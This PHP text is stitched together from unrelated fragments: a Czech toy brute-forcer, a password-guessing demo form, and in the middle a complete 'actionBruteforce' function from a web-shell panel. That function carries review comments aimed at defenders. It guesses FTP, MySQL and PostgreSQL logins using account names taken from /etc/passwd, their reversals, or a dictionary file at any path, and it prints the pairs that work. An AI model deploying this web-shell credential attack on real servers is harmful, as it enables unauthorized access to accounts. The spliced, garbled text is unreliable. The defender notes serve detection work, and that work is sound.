$word[$wpos] = $prelast; } } */ return $word; } //===CODE=== //$test = ("nazdar"); //echo ($test["2"]); //die(); echo nextChar("d") . "\n"; echo bruteForce("ahoj") . "\n----------------------\n\n"; $ted = "a"; while (1) { echo $ted . "\n"; $ted = bruteForce($ted); } /* $hash = ("79c2b46ce2594ecbcb5b73e928345492"); $pass = ("ahoj"); //echo(md5("ahoj")); $loop = 1; while($loop) { $now = $pass; if ( md5($now) == $hash ) { die ("Hash: $hash\nVysledek: $now\n"); }
/**
 * Credential-guessing action of a web-shell style panel.
 *
 * Without a POSTed `proto` it only renders the form. With one, it declares a
 * protocol-specific bruteForce() helper (ftp, mysql or pgsql), builds candidate
 * login/password pairs and prints every pair the helper reports as accepted,
 * followed by attempt and success counters.
 *
 * Request parameters read: proto, server ("host" or "host:port"), type
 * (1 = account names from /etc/passwd, 2 = dictionary file), reverse, dict,
 * login, plus a and charset, which are echoed back as hidden fields.
 * hardHeader() and hardFooter() are defined elsewhere and are not visible here.
 *
 * Review notes for defenders:
 * - The web server process reads /etc/passwd and an arbitrary path taken from
 *   $_POST['dict'], then opens outbound FTP/MySQL/PostgreSQL connections; file
 *   reads and bursts of failed logins originating from the web host are the
 *   observable side effects.
 * - Every network and file call is prefixed with @, so failures raise no PHP
 *   warnings; the PHP error log is therefore a poor signal for this activity.
 * - The literal form markup and parameter names in this block are stable
 *   strings that can be matched when scanning a web root for this panel.
 */
function actionBruteforce() {
    hardHeader();
    // Results section: runs only when the form was submitted.
    if (isset($_POST['proto'])) {
        // Request values are HTML-escaped before being echoed back.
        echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
        // bruteForce() is declared conditionally, so only one variant exists per request.
        // If proto is none of the three values, no helper is declared and the calls below fail.
        if ($_POST['proto'] == 'ftp') {
            // Returns the ftp_login() result, or false when the connection fails; port defaults to 21.
            function bruteForce($ip, $port, $login, $pass) {
                $fp = @ftp_connect($ip, $port ? $port : 21);
                if (!$fp) {
                    return false;
                }
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif ($_POST['proto'] == 'mysql') {
            // Uses the legacy mysql_* extension (removed in PHP 7); port defaults to 3306.
            // The connection result is returned after mysql_close() has been called on it.
            function bruteForce($ip, $port, $login, $pass) {
                $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif ($_POST['proto'] == 'pgsql') {
            // Unlike the ftp/mysql variants, $port is used as given, with no default.
            // NOTE(review): the user/password fields are literal asterisks in this listing
            // (apparently masked), so $login and $pass are not part of the string as shown.
            function bruteForce($ip, $port, $login, $pass) {
                $str = "host='" . $ip . "' port='" . $port . "' user='******' password='******' dbname=postgres";
                $res = @pg_connect($str);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        // "host:port" split; $server[1] is absent when no port was given, hence the @ below.
        $server = explode(":", $_POST['server']);
        if ($_POST['type'] == 1) {
            // Mode 1: the first field of each /etc/passwd line (the account name) is the login.
            $temp = @file('/etc/passwd');
            if (is_array($temp)) {
                foreach ($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    // Candidate password is the account name itself.
                    if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
                        $success++;
                        echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
                    }
                    if (@$_POST['reverse']) {
                        // Second candidate: the account name reversed, built byte by byte.
                        $tmp = "";
                        for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
                            $tmp .= $line[0][$i];
                        }
                        ++$attempts;
                        if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
                            $success++;
                            echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
                        }
                    }
                }
            }
        } elseif ($_POST['type'] == 2) {
            // Mode 2: fixed login from the request, one candidate password per line of the
            // file named by $_POST['dict']; that path is passed to file() without any checks.
            $temp = @file($_POST['dict']);
            if (is_array($temp)) {
                foreach ($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) {
                        $success++;
                        echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
                    }
                }
            }
        }
        echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
    }
    // Form is always rendered; the heading says FTP although three protocols are offered.
    // Hidden fields c, a and charset carry escaped values from $GLOBALS['cwd'] and the request.
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<input type=hidden name=ne value="">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>' . '<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>' . '<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
    echo '</div>';
    hardFooter();
}
"> </fieldset> <fieldset> <input type="hidden" name="try" value="1"> <input type="submit" value="Find it"> </fieldset> </form> <p> <?php $count = 0; if (isset($_POST['try'])) { set_time_limit(5); $check = function ($pwd) { //print htmlentities($pwd).'<br>'; return $pwd == 'abcd'; }; $password = bruteForce($chars, $check, $max, $min, $trymax, $count); if (false === $password) { print 'Password not found'; } else { printf('Password is "%s"', $password); } } ?> </p> <p style="font-size:11px;"> <?php print (int) $count . ' tries '; print ' took ' . sprintf("%.2f", microtime(true) - $_SERVER["REQUEST_TIME_FLOAT"]) . ' secondes'; ?> </p>